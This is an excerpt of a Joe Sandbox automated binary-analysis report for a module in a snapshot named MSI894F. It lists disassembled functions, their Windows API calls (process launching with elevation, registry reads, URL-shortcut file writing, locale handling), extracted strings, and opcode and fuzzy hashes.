Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 496407989ee35d4593821151f8c22d9720b77aeb9e708dfb11301036085b51a0
Instruction ID: 9c38d8b78adfa91935e88712ab2fdf475c8144a8ebce1432a5c81c0fb3c23950
Opcode Fuzzy Hash: 496407989ee35d4593821151f8c22d9720b77aeb9e708dfb11301036085b51a0
Instruction Fuzzy Hash: B3E06D311017285AEB212AA9AC29B5B3B5DDF423B0F998123EC4D962E1FF60CC0182F1

Function 00D4CC50 Relevance: 1.3, APIs: 1, Instructions: 75COMMON

Download Yara Rule

APIs

Part of subcall function 00D55DC8: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00D55DE0

Part of subcall function 00D4C9C0: std::_Lockit::_Lockit.LIBCPMT ref: 00D4CA1A
Part of subcall function 00D4C9C0: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00D4CA80
Part of subcall function 00D4C9C0: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00D4CB4F

LocalFree.KERNEL32(?,?,?,00D9B6C9,00000000,00D9B6C9), ref: 00D4CD01
__cftoe.LIBCMT ref: 00D4CE5E

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: std::_$Locinfo::_$FreeLocalLocimpLocimp::_Locinfo_ctorLocinfo_dtorLockitLockit::___cftoestd::locale::_
String ID:
API String ID: 2839935148-0
Opcode ID: d2cb67efb0d1c96a36cd1269f44d9a3d81da12905cb858eb06410c57b49c1a96
Instruction ID: f07cf617dc3d698be8f13fbfbd31d147a648210feec935ad4641d6730776ac77
Opcode Fuzzy Hash: d2cb67efb0d1c96a36cd1269f44d9a3d81da12905cb858eb06410c57b49c1a96
Instruction Fuzzy Hash: 562195B1D112489FDB04DF68C945BAEFBB5EB05710F508229E825A73C0EB746A448BB5

Function 00D7AA95 Relevance: 1.3, APIs: 1, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00D7B127: RtlAllocateHeap.NTDLL(00000000,?,?,?,00D7AAAA,?,00000000,?,00D6C282,?,?,?,?,?,?,00D41668), ref: 00D7B159

HeapReAlloc.KERNEL32(00000000,?,?,?,00000000,?,00D6C282,?,?,?,?,?,?,00D41668,?,?), ref: 00D7AAF2

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: Heap$AllocAllocate
String ID:
API String ID: 2177240990-0
Opcode ID: bf002d7981b22db78bcb36073f55df2210c21aa2e403768aee93e8f687540f76
Instruction ID: 5d80eb9067f25b4896f84f91c9b5e3db8a18c0fae0e55f11787fa0d633da2e19
Opcode Fuzzy Hash: bf002d7981b22db78bcb36073f55df2210c21aa2e403768aee93e8f687540f76
Instruction Fuzzy Hash: BBF06231641215A6DB216A2DAE01B6F775CCFC1771B19C116F85D96190FA20CC01D3B3

Function 00D484C0 Relevance: 1.3, APIs: 1, Instructions: 4memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LocalAlloc.KERNELBASE(00000040,00000000,00D6839D,00000000,7EBC463A,?,00000000,?,00000000,?,00D8CB8D,000000FF,?,00D417D5,00000000,00D8D3BA), ref: 00D484C6

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: 1fa0db62e6b1ecdac3568104350579e72a66af43bbc99d28822ec3a3ae45dc93
Instruction ID: 6fdbbbbf875d081a4c2bf0c097a5880c16cbad4ffc428f8d09f6517f67eb2b0e
Opcode Fuzzy Hash: 1fa0db62e6b1ecdac3568104350579e72a66af43bbc99d28822ec3a3ae45dc93
Instruction Fuzzy Hash: F0A00275554700ABDE455B909E0EF097B62AF84F11F004444F349D41E086794450EB26

Non-executed Functions

Function 00D4D060 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 472COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00D4D200
LocalFree.KERNEL32(00000000), ref: 00D4D257
_swprintf.LIBCMT ref: 00D4D440
LocalFree.KERNEL32(00000000), ref: 00D4D497
_swprintf.LIBCMT ref: 00D4D592

Strings

%, xrefs: 00D4D519
+, xrefs: 00D4D506

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: _swprintf$FreeLocal
String ID: %$+
API String ID: 2429749586-2626897407
Opcode ID: 467cbfbcb6695737335f11611f044e5e2f72dc8b3b0de1ce146b5babbbe8a634
Instruction ID: 8510a0c46ad3060c96c710e06a7b108c050f13ddf56feaad5d3a231636ae1f89
Opcode Fuzzy Hash: 467cbfbcb6695737335f11611f044e5e2f72dc8b3b0de1ce146b5babbbe8a634
Instruction Fuzzy Hash: 6002CE71E10219AFDB15DFA8DC44BAEBBB6FF49300F144629F801AB281D734A941CBB1

Function 00D50E90 Relevance: 11.0, APIs: 2, Strings: 4, Instructions: 455registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,-00000002,00000000,00000001,?), ref: 00D512C4
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,00DA57C0,00000800), ref: 00D512E1

Strings

/EnforcedRunAsAdmin , xrefs: 00D50EB0, 00D50EBA, 00D50EE3, 00D50F01
/DontWait , xrefs: 00D50F37, 00D50F40, 00D50F6C, 00D50F8E
/HideWindow, xrefs: 00D51075, 00D5107F, 00D510AC, 00D510BC, 00D510DB
/RunAsAdmin , xrefs: 00D50FCE, 00D50FD9, 00D51003, 00D51013, 00D51032

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: OpenQueryValue
String ID: /DontWait $/EnforcedRunAsAdmin $/HideWindow$/RunAsAdmin
API String ID: 4153817207-1914306501
Opcode ID: 4cb089bdd2d848cf8c50aa201ace5980c7a6b7237bcdb1c378cc5f233c1e02f9
Instruction ID: 133cbf931b2164e103f49834c58e3b021580cf2637621afdfb409471d790574c
Opcode Fuzzy Hash: 4cb089bdd2d848cf8c50aa201ace5980c7a6b7237bcdb1c378cc5f233c1e02f9
Instruction Fuzzy Hash: 6FE1F128A043528ADF349F18D851776B3E1EF95782F5D40A9EC85CB295E771CC8AC3B1

Function 00D83BA3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00D83EC1,00000002,00000000,?,?,?,00D83EC1,?,00000000), ref: 00D83C3C
GetLocaleInfoW.KERNEL32(?,20001004,00D83EC1,00000002,00000000,?,?,?,00D83EC1,?,00000000), ref: 00D83C65
GetACP.KERNEL32(?,?,00D83EC1,?,00000000), ref: 00D83C7A

Strings

OCP, xrefs: 00D83BF7
ACP, xrefs: 00D83BC1

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: a3fdd02e925a4e529745451b02c31cfaeedc2cdc6f25018ada400ead82aaca5c
Instruction ID: a4c08a68040d35b6d5061f13e86678f0e4f1ec91d86b12977efa5f5f3f4c6e20
Opcode Fuzzy Hash: a3fdd02e925a4e529745451b02c31cfaeedc2cdc6f25018ada400ead82aaca5c
Instruction Fuzzy Hash: 61216072600201AADB24AF25C905A97B3A7FF50F50B5A8424E94EE7250E732EF41C370

Function 00D83D78 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00D7AE3C: GetLastError.KERNEL32(?,00000008,00D803BC), ref: 00D7AE40
Part of subcall function 00D7AE3C: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00D7AEE2

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00D83E84
IsValidCodePage.KERNEL32(00000000), ref: 00D83ECD
IsValidLocale.KERNEL32(?,00000001), ref: 00D83EDC
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00D83F24
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00D83F43

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: 3e86fed1b0fe66469239591246f1e210586b1caa21936557e21e4cec5a359cb4
Instruction ID: 3d209c64fd8c2a53146c26c0e08762afaa8d32d4b121664e87e6b9bf4328f559
Opcode Fuzzy Hash: 3e86fed1b0fe66469239591246f1e210586b1caa21936557e21e4cec5a359cb4
Instruction Fuzzy Hash: F7514D72A10205ABDF21EFA5CC45ABE77B9EF48B00F184569F909E7190EB70DA44CB71

Function 00D83414 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 251COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00D7AE3C: GetLastError.KERNEL32(?,00000008,00D803BC), ref: 00D7AE40
Part of subcall function 00D7AE3C: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00D7AEE2

GetACP.KERNEL32(?,?,?,?,?,?,00D7994B,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00D834D5
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00D7994B,?,?,?,00000055,?,-00000050,?,?), ref: 00D83500
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00D83663

Strings

utf8, xrefs: 00D835D2

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: ErrorLast$CodeInfoLocalePageValid
String ID: utf8
API String ID: 607553120-905460609
Opcode ID: 7c4ff693d0ed90de2dc3d06a7ce7673b5857d548216f35be5c9af918237b332c
Instruction ID: 5a69111caad397830b7ccf72519b440b63c579b760a541c8d332e0dd0179fc6e
Opcode Fuzzy Hash: 7c4ff693d0ed90de2dc3d06a7ce7673b5857d548216f35be5c9af918237b332c
Instruction Fuzzy Hash: 4D71F271600306AAEB25BB78CC46BBA73A8EF44B00F184469F54DD7181FB74EA458770

Function 00D7B336 Relevance: 6.3, APIs: 4, Instructions: 337COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00D7B3C3

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: f068e2ee9b525f32e3efd226be2df2fe614e6fc1a05ef0a7f01a5d797c6cceda
Instruction ID: 9d922d321feb0fc7873bed8b038d8c2a302494c37ff3a6a02cd9b4c3a552fde6
Opcode Fuzzy Hash: f068e2ee9b525f32e3efd226be2df2fe614e6fc1a05ef0a7f01a5d797c6cceda
Instruction Fuzzy Hash: 89B147729042459FDB118F68C891BFEBBA5EF55324F18C16BE949AB242E335DD01CBB0

Function 00D8069D Relevance: 6.1, APIs: 4, Instructions: 129fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 00D80738
FindNextFileW.KERNEL32(00000000,?), ref: 00D807B3
FindClose.KERNEL32(00000000), ref: 00D807D5
FindClose.KERNEL32(00000000), ref: 00D807F8

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: 32f1c289c860de5b11a1448f6503ec00568d63fb4aa3fed054710d3d1798786e
Instruction ID: 2c70002782f253112d90a5c3577d039acb2225b3aac738277306b6c401683c11
Opcode Fuzzy Hash: 32f1c289c860de5b11a1448f6503ec00568d63fb4aa3fed054710d3d1798786e
Instruction Fuzzy Hash: 2041B671900619AFDB60FFA8CC89EAEBB79EF84314F144195E905E7185E6309E88CF70

Function 00D683BD Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D683C9
IsDebuggerPresent.KERNEL32 ref: 00D68495
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00D684B5
UnhandledExceptionFilter.KERNEL32(?), ref: 00D684BF

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 0242f85c29ea84fd0d2964c0286fcbb9676a8dd72d250998de55496f0e0c0497
Instruction ID: 8a420e3799a4fa28cf64fa146c07a6916f45e2d262737d4a92f2d888053a7cd0
Opcode Fuzzy Hash: 0242f85c29ea84fd0d2964c0286fcbb9676a8dd72d250998de55496f0e0c0497
Instruction Fuzzy Hash: 26311A75D013189BDB10EF64D9897CDBBB8EF04300F10419AE40DAB290EB715A84DF54

Function 00D52161 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30windowCOMMON

Download Yara Rule

APIs

GetLocaleInfoEx.KERNEL32(!x-sys-default-locale,20000001,00000000,00000002,?,?,?,00D43270,?), ref: 00D52176
FormatMessageA.KERNEL32(00001300,00000000,7EBC463A,00000000,00000000,00000000,00000000,?,?,?,00D43270,?), ref: 00D52198

Strings

!x-sys-default-locale, xrefs: 00D52171

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: FormatInfoLocaleMessage
String ID: !x-sys-default-locale
API String ID: 4235545615-2729719199
Opcode ID: f52a640cb873ead8396a54e0129a97f3db650f935a1327924bf8c205a654f0ff
Instruction ID: 6e66ce8c4871edef328fd61ed5b3cc9a0f81f2ad5b9512aefef321be23558ab6
Opcode Fuzzy Hash: f52a640cb873ead8396a54e0129a97f3db650f935a1327924bf8c205a654f0ff
Instruction Fuzzy Hash: 14E039B6560218BEEB04AFA0CC0BDBB7B6DEB057A1F104114BD01D2180E2B06E048BB0

Function 00D47660 Relevance: 42.4, APIs: 16, Strings: 8, Instructions: 384libraryloadersleepCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryW.KERNEL32(00000010,00000104,?,?), ref: 00D4781F
GetForegroundWindow.USER32(?,?), ref: 00D478A4
ShellExecuteExW.SHELL32(?), ref: 00D478C1
ShellExecuteExW.SHELL32(?), ref: 00D478FF
GetModuleHandleW.KERNEL32(Kernel32.dll,GetProcessId,?,?,?), ref: 00D47942
GetProcAddress.KERNEL32(00000000), ref: 00D47949
AllowSetForegroundWindow.USER32(00000000), ref: 00D47953
GetModuleHandleW.KERNEL32(Kernel32.dll,GetProcessId,?,?,?), ref: 00D47973
GetProcAddress.KERNEL32(00000000), ref: 00D4797A
Sleep.KERNEL32(00000064,?,?,?), ref: 00D47997
EnumWindows.USER32(00D47A90,?), ref: 00D479B3
BringWindowToTop.USER32(?), ref: 00D479C2
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?), ref: 00D479DF
GetExitCodeProcess.KERNEL32(?,?), ref: 00D479EC

Part of subcall function 00D47D30: CloseHandle.KERNEL32(?,7EBC463A,00000010,00000010,?,?), ref: 00D47D72

GetWindowThreadProcessId.USER32(?,?), ref: 00D47A9C
GetWindowLongW.USER32(?,000000F0), ref: 00D47AB4

Strings

GetProcessId, xrefs: 00D47938, 00D47969
.cmd, xrefs: 00D477E0
open, xrefs: 00D47858
/C ""%s" %s", xrefs: 00D47844
.bat, xrefs: 00D477AA
%s\System32\cmd.exe, xrefs: 00D4782C
Kernel32.dll, xrefs: 00D4793D, 00D4796E
runas, xrefs: 00D47874

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: Window$Handle$AddressExecuteForegroundModuleProcProcessShellWindows$AllowBringCloseCodeDirectoryEnumExitLongObjectSingleSleepThreadWait
String ID: %s\System32\cmd.exe$.bat$.cmd$/C ""%s" %s"$GetProcessId$Kernel32.dll$open$runas
API String ID: 1023610922-986041216
Opcode ID: d8034bef88ccc9a8ad5310f936a1f9f51135f58a1fccebfbc8b38b2f4a7a0b3c
Instruction ID: d16d568719a59a09afeef6359c8ea54ef0620aceb23618db2801f13ba6803732
Opcode Fuzzy Hash: d8034bef88ccc9a8ad5310f936a1f9f51135f58a1fccebfbc8b38b2f4a7a0b3c
Instruction Fuzzy Hash: 6DE19E71A043099FDB10DFA8C989AAEBBB5FF14314F188569E515EB391EB309905CF70

Function 00D41250 Relevance: 33.6, APIs: 17, Strings: 2, Instructions: 319libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(Advapi32.dll), ref: 00D412D8
GetLastError.KERNEL32 ref: 00D41306

Part of subcall function 00D41910: LocalFree.KERNEL32(?,7EBC463A,?,00000000,00D892C0,000000FF,?,?,00DA1348,?,00D41E3E,8007000E), ref: 00D4195C

GetProcAddress.KERNEL32(00000000,ConvertStringSidToSidW), ref: 00D4131C
FreeLibrary.KERNEL32(00000000), ref: 00D41335
GetLastError.KERNEL32 ref: 00D41342

Strings

ConvertStringSidToSidW, xrefs: 00D41316
Advapi32.dll, xrefs: 00D4129D

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: ErrorFreeLastLibrary$AddressLoadLocalProc
String ID: Advapi32.dll$ConvertStringSidToSidW
API String ID: 2442427113-1129428314
Opcode ID: defebbc4d09099c0eacd23f94a99a00d10aa5c562fe5f7230f4bc8620f435b98
Instruction ID: a9feae9c2d0a02d951e3bfc99d669df1a322ea128fa63ac5101297525ff00593
Opcode Fuzzy Hash: defebbc4d09099c0eacd23f94a99a00d10aa5c562fe5f7230f4bc8620f435b98
Instruction Fuzzy Hash: C3D16A75C01309ABDB10CF98C944BAEBBF6FF89714F294219E815A7380D775AA45CBA0

Function 00D48790 Relevance: 30.1, APIs: 13, Strings: 4, Instructions: 349filememoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00D4880D
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00D48860
LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,00000000,00D8A285,000000FF), ref: 00D4886F
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00D4888B
WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,00D8A285,000000FF), ref: 00D4896B
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000,00D8A285,000000FF), ref: 00D48977
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,00000000,00D8A285,000000FF), ref: 00D489B3
LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,00000000,00D8A285,000000FF), ref: 00D489D2
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,00000000,00D8A285,000000FF), ref: 00D489EF
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,00D8A285,000000FF), ref: 00D48A83
ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000005), ref: 00D48ACE
ShellExecuteW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000005), ref: 00D48B1C
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000000,00D8A285,000000FF), ref: 00D48B4B

Strings

URL Shortcut content:, xrefs: 00D48A09
[InternetShortcut]URL=, xrefs: 00D4889F
open, xrefs: 00D48AC7, 00D48AE3
-_.~!*'();:@&=+$,/?#[], xrefs: 00D488E7, 00D488FE

Memory Dump Source

Source File: 00000004.00000002.1916700663.0000000000D41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000004.00000002.1916685196.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916728897.0000000000D8D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916747532.0000000000DA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1916760863.0000000000DA7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d40000_MSI894F.jbxd

Similarity

API ID: ByteCharLocalMultiWide$AllocExecuteFileFreeShell$CloseCreateHandleWrite
String ID: -_.~!*'();:@&=+$,/?#[]$URL Shortcut content:$[InternetShortcut]URL=$open
API String ID: 2199533872-3004881174
Opcode ID: 9222415b9234f2be9871fa4acf9d1c4793386a9a728ebdf3f3d92b559f60208d
Instruction ID: ba3c1f4a4f59f73ad0b7940f79bf7c736cddff17c49f5bb52220001a18bbc27f
Opcode Fuzzy Hash: 9222415b9234f2be9871fa4acf9d1c4793386a9a728ebdf3f3d92b559f60208d
Instruction Fuzzy Hash: E7C103719003459FEB20DF68CC85BAFBBB5EF55740F18412AE504AB2C1EB748A45DBB1

Function 00D67769 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 51libraryloaderCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(00DA4AF8,00000FA0,?,?,00D67747), ref: 00D67775
GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00D67747), ref: 00D67780
